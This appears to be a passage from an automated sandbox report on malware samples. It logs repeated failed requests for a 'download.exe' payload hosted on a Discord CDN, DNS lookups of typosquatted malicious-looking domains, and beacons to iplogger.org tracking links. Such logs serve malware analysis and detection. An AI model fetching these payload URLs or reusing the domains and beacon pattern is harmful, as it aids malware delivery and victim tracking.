                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HvH15XIW50MncON%2BE%2BoOk0t%2BNJ4RteE%2BJ7kwuwCNOvQ1WTSjNDYT3DSrW3h1dsbyB66iA1y38eQhCHQiMzs4zCR8WFuh1LHSLfX390qcxSAWWlXAYdwCIh8c4oy7ILhbIBW3Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=VC6xmoDjkAC.6mP3GLAb4W87a5eXVYvtkvkAjfSCse8-1730889748372-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a1f3da193f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:33 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=rBRCiUY6l07k.HQx_rtAbpTrZWNBot5AI43xA44ce.o-1730889753-1.0.1.1-jXwY7mGBdn45yvqrFuzlBx1YTyDrX8zqrrD3X7ODsZOSJRYb3Mdm0Ska96sASwbhiM8r2k2lI8I2F90lwNJUhQ; path=/; expires=Wed, 06-Nov-24 11:12:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bs8l5SwAnXxId8CodQgC3sx7Wr2XsFe8s5Rzcnl7bKXfM7MDY455H7MwOhnGycubHKMsQb9DBvYT%2Fpe1wLDwDaGFrQ25%2FSkGTG9TnftDPV1OWRTMV2ITKywPszryunisOMEznw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Z00mNpjfgmLso53PE7qGfCJ9FgaqUdTWHibyWygE.kY-1730889753442-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a3eee6793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:38 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=D5EKLujdQHWvzu7MfC9Q5BaQArLxNZ.jJiz4jb.OZXU-1730889758-1.0.1.1-eW4bcWJqHdZDwxM2B9lpVC6e517CjPTxb1e.6G7nWLxsUZNrXbBXEkwSi58AzdnD940SA9xr3uNsHiENZQsE8A; path=/; expires=Wed, 06-Nov-24 11:12:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbGzJFNAIW0C%2BvpUqz32FxAcODPgnEMo7ITDAoFYxAOPGuTy%2B39P9OljQnE9cM6JmGKdVGv9sb7jjPpBK2F4VOeWhqRdlE1vcXYR7WoSuk5gHUSx6Z6fXlcBwfOXf3tu8MFjQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=c50BGulxy5FyKL80gt6gfXJjMjAOz5WyiXjtW8ifqRw-1730889758523-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a5e8b6a93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:43 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=hE2M4OAM7OT_gonlFyy4PMdkYEzE_WrEpLbuqfaqhTk-1730889763-1.0.1.1-hLN2XRmnrznECiQPmG18c81_QjWdsUyq85_Vy6yh7anM0GCSWqFHnDPuLD0LsEH2rPGoyO0Yo3AtlwqV3Q6qcw; path=/; expires=Wed, 06-Nov-24 11:12:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nsob%2F%2BCra0tIUouovdlsNYEyM4%2BRxPOTbKsISD4EPVVkqDFY8jbhMxruwDUuygfPxJ23QFWWo7FAaebghxmcTECHPwQ226Ge3IzstRH9ZptwJrAKMR00Hy7gyZsNQNpBodlsZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=QY5roHK7TFF3lAdpS4reGA.0.SnOYqggmgr.b4BF.6o-1730889763614-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a7e5f6293f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:48 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=Fcp34o96LqWky4G4wxaFmj5Ttj7rtdiCnBR5WchDT_o-1730889768-1.0.1.1-S76vJsw9MGwnrgiJTWhw0g9QPylDiBtW1b7oAOyDWL5oNeKZitedA2Nv96hj7VuerwFScN9whpT_ivwbbQCXwQ; path=/; expires=Wed, 06-Nov-24 11:12:48 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rooIBva9YSqukwaoocHxsN436izV0P2XGAmFYm6zF7oJrr7xxJeLMCE7x7XmVRD4TepHZ9a8lZla%2FTxaQwGQbh33t1XBwAsyFBfmcPlWXisVVbdsA4f9WN7ZuuDHuNwDVSderQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Kyr9QXxPnN5TTJjQ33hn.qCMpC.efVzMjbiC.CwsNLU-1730889768689-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a9e2af793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:53 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=550zinMeF6.AdbWX4rd2SWmu26zJZzC3fXNcTRXrL_E-1730889773-1.0.1.1-FtSMJyI2FEvmg_EO_vRohI_ck9QoejnHbQMtZBXeqPwMpw6kKI8uGfnWg5wnYaUWrQzAfRd.LDaIjN17FtuIjA; path=/; expires=Wed, 06-Nov-24 11:12:53 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnnN9H7ZIjbDNvMnJi%2FxNLGM%2BPiasMWf07wfhJQf7U2G2BnJFswjNdY27OA2TTckzYGfgw3kF4WGb4lT%2B6xL77Yk5WLEHF5wujU3h2jDFUsCxovsRDJtzSdL0UhehA2VQORPuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Wr1nSp.1d9H7.MiRRzTdYBzIqNrjOnWljRW8i2odEu0-1730889773756-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47abdee0e93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:58 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=OFCQc6Zb1vm_yBXfh4poy.qsFzE4RQEzu_tCzuZwu5A-1730889778-1.0.1.1-GXioKzxNQylm4RkGkwGaiZCSYDEsQQLP1Y8FQizUtfcfUOMdCv6PjkC0a3ygdMCdLtIv224Y2tCBzDYpdhj8cQ; path=/; expires=Wed, 06-Nov-24 11:12:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJik8%2FfsVkDby%2F79mrC3YjJlJ3u9HS4h9Ab7FcKHFu6biawReCZ9QvZNuvPs5ldACH4ogZ7vI9OHMtgIn1QfepV2n6o39rqXv9y68Q1QhOivRfHLy55RoWdjSH9lJjHFlCQ0xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=jBUTTd5Ks3tVDpyL6hoI.HfwwESt90Tn2KesRdV7rsM-1730889778815-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47add898093f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:03 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=4ZkX4p_b0X_YZVNp1cQA2SKbgiwFJ8mBWz3G_sCRraw-1730889783-1.0.1.1-JTI0JM6JTNBPiJ7WbT6LGM5EWVdyxj_FZFBhe7O5B0G4FEzCdjUsajOdgA3vuq8Btikd4SC6WA21FmoJ1am3og; path=/; expires=Wed, 06-Nov-24 11:13:03 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBl8jMFWINaYTDBgNKg%2BWpRyVoYySlLhjK7%2Ba%2F3wFW55ol%2Bi%2BHKxdZbokkRZSBAibbVeiwo9Fl9Hw5BZQu%2Bz2QKurolTqOkN5Jp9B1wFXNlKc8E1s171W8rqbUz94mOMEfoGRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=tv1GcPsadOwqqJRwTGY0p1IWrDuftaGA3kMC52HNS_M-1730889783885-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47afd2d4d93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:08 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=KdT9X_ztG.W2bLFx4uaj59SvoFohQXjY_foDf7LzFr8-1730889788-1.0.1.1-x9fl2qbmRTaRMshX76LVYjEkChfepcOmTXh8CbMcHvwfKnTAQDAlJtTY97Y_CZyssRc1M5kSiYQNuPB_a_alYg; path=/; expires=Wed, 06-Nov-24 11:13:08 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lbmBduZuzAgXUOzyzXCmyg3kdbk7r3DZTSUyZ6ISn%2ByAP1Pdy0IEDSzT%2FJ8aHWIf9a6J%2BDEzIktfaZ%2BgQ19ETOoy%2FWWTq%2Bhtbobw8V7TbkOk60u%2BGR2v2y5AP4B6pF1r%2B7XG1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=b3Mg0O8IYxWMOX5IpMoRhkJhZ2FASeglwU4BbBIZXjY-1730889788975-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b1cda8393f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:14 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HnV5_8qdJxJlscvG1aPocuv.yWhwZ8o6FR_tjArhMEw-1730889794-1.0.1.1-_yiZ6kPA2ypR.XKlud_3uES16SEppij8OKuOlEjaknU9uy6x9uKhCjzT5DpgpHbNgNC0p4xhdWV5loqF_G607Q; path=/; expires=Wed, 06-Nov-24 11:13:14 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FolfGHcSabJ0fc275lCuf35GQT7cCKArETaKNGoVqYWk6oiQaC1T3p9C22A56p7S4YsaHb%2BXtWHOkRzo5x2zcrmdvALj2WMIIyGDaGbBc4oFcOKLBRtnjHk4Y4ns0W80hdyUQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=sQrgvyVPRlppJKdVbeqLXNBeHqgj3ILV8dK7UFP2AW4-1730889794055-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b3cadee93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:19 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=3QRHv1i69xM6M1s5ZdQG7U_BDMc7G52gpTdbfyhedV8-1730889799-1.0.1.1-RV2dKn1fBa3InlHF4S8aT5AfIGUz1wp8txI8HRRwUMBOGcKlh5rMfj1T7NN5biIU.b3ZdYSaOngaAlzp1vCwmg; path=/; expires=Wed, 06-Nov-24 11:13:19 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLrVxrtCgAb45Y%2FG9uyoof1vtEM1e3KyWM5hrl2JDxEXHOluVm%2BAhBK4QRwq%2BeKgOeciqu8rzJM227CHaab4iVNe%2FY9ZBlQzhCEaQAjy0ZyJrzEwOuqNPr%2FDjSDB4NKH35cNpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=GH6rMB5aEt2WxAWSN9wmNwx6Y7Uesyeg_MrqXy0usKA-1730889799174-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b5c687e93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:24 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=LGmxnY2PC4O.YpBVaI8_aDfb09K2CbFdN5CHNLQqck8-1730889804-1.0.1.1-AB.qmIy7dn_GytsY9.t8tQIrJJWvgcLNdrWEjpMr6RHICtrpfLnrxK10ZsYNyKKrQUvrTPUfilAv32Ncep91yQ; path=/; expires=Wed, 06-Nov-24 11:13:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCgMnVwug44S80TDys9jgkkXRZL6VGzYTjmbuxa6sZvc3%2FyTioZ6xxjouzVBQZkUOMYvzAF5Y9xMEmdpmA5XzKFO%2FuTTcBg%2BkigNMu%2Fi5LbGu1%2B30Kv6G%2FdISzWwdwlzzJPU3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=J0ox_5zVq6J4sTvGfkmmW5o3mEuDvnRPO3ZBGlRzMLw-1730889804263-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b7c6e8193f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:29 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=oK.rRzcEwqpiyYW56MVpUeXhwLzXUgsDuV0u0sudXvs-1730889809-1.0.1.1-BIvF7FPc9ZaQXRhkBuPnCLFdYeNwmd8BcUUIk1QquH.H7l_8eHXfW0UzVI_sAnpTQwptzMtYky_af3hL_DwRxQ; path=/; expires=Wed, 06-Nov-24 11:13:29 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=15jssAz8sGSEOVVpD84tGRdJ1SDu4YSrSpYEvqcxU8J8TGuSo5pFtSD7DrReU8bRH889ZLN75wcCZv%2BPi0WFnVFYOCycKfaDnWNZcMGMBlcWJ5plid59qlLFFrv0IbeXeTw20g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=91eKZaeTLffbfLZ7a7SAfMz29sprxUIxC2r2wPpZSYE-1730889809385-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b9c3b4993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:34 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=r9K.h4Ki6frjXzkEKGJBZ66FaGnz2pltXz_kISZMyXI-1730889814-1.0.1.1-TzNP71DjVf33d3gB4ly12ZasI8ZerW9Fn_IRZR42c_GSisPq6H7AxRlxnyc3xJOjYW8rOAtRUU6EgsbOV.gY6w; path=/; expires=Wed, 06-Nov-24 11:13:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLlOjZRy%2F2KbONNkFhfTVuYF8qLROWS%2BrmlAG27cm91NPx09fyRP44Zso9ZIIHvzlqdJC0nkWTyJtjq635XBVHpc4C5WgREGTrxGIx%2FeRWS%2F0oYafgkU6OmtkeN%2Ba7wlH18zOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=cpmO48xr2CHbdqti9KMGMynebPDnJ3kuFbc96JYJ8HU-1730889814466-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47bbc490593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  DNS
                  all-mobile-pa1ments.com.mx
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  all-mobile-pa1ments.com.mx
                  IN A
                  Response
                • flag-us
                  DNS
                  buy-fantasy-football.com.sg
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  buy-fantasy-football.com.sg
                  IN A
                  Response
                • flag-us
                  DNS
                  buy-fantasy-gxmes.com.sg
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  buy-fantasy-gxmes.com.sg
                  IN A
                  Response
                • flag-us
                  DNS
                  topniemannpickshop.cc
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  topniemannpickshop.cc
                  IN A
                  Response
                • flag-us
                  DNS
                  iplogger.org
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  iplogger.org
                  IN A
                  Response
                  iplogger.org
                  IN A
                  104.26.3.46
                  iplogger.org
                  IN A
                  172.67.74.161
                  iplogger.org
                  IN A
                  104.26.2.46
                • flag-us
                  GET
                  https://iplogger.org/143up7
                  Mon1631358b82299bd8.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /143up7 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                  Host: iplogger.org
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Wed, 06 Nov 2024 10:41:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 8092
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  cf-chl-out: 32CcSPp0FY4lWtCeu2xYrsBg56MdOrvVbTZIMW9FeXAI+oI4I3QadEucP4UE1MnoYWmGbNwJH58CWf3w8VCTWhHbTf7ibQIjzwmfPwo9NzHtn8Kc7Iy/UfsjuoVTGZUcGTbvey8sNGpPsCgVWruhSg==$o53EBoPry58zunU4+W7bjA==
                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVsipYEkWnWQ493cqn6cqCe3ziyaCbdLcJ%2BqE%2BNdMyfZB%2BWLweCBu6n2B4SGEjlWTsSYStL%2FEbKC4t3un5onw%2FK%2F3WmmpsL5rEPPD3Qpu6LqwqEOg9Vop9SE3qcOVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de4787a69e0948e-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=42337&sent=6&recv=7&lost=0&retrans=1&sent_bytes=3186&recv_bytes=514&delivery_rate=88868&cwnd=252&unsent_bytes=0&cid=7e3532698f612d15&ts=2903&x=0"
                • flag-us
                  GET
                  https://iplogger.org/1Brhn7
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /1Brhn7 HTTP/1.1
                  User-Agent: m1122
                  Host: iplogger.org
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 200 OK
                  Date: Wed, 06 Nov 2024 10:41:18 GMT
                  Content-Type: image/png
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: 312752312328304940=3; expires=Thu, 06 Nov 2025 10:41:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                  Set-Cookie: clhf03028ja=138.199.29.44; expires=Thu, 06 Nov 2025 10:41:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                  memory: 0.45774078369140625
                  expires: Wed, 06 Nov 2024 10:41:18 +0000
                  Cache-Control: no-store, no-cache, must-revalidate
                  strict-transport-security: max-age=31536000
                  x-frame-options: SAMEORIGIN
                  cf-cache-status: DYNAMIC
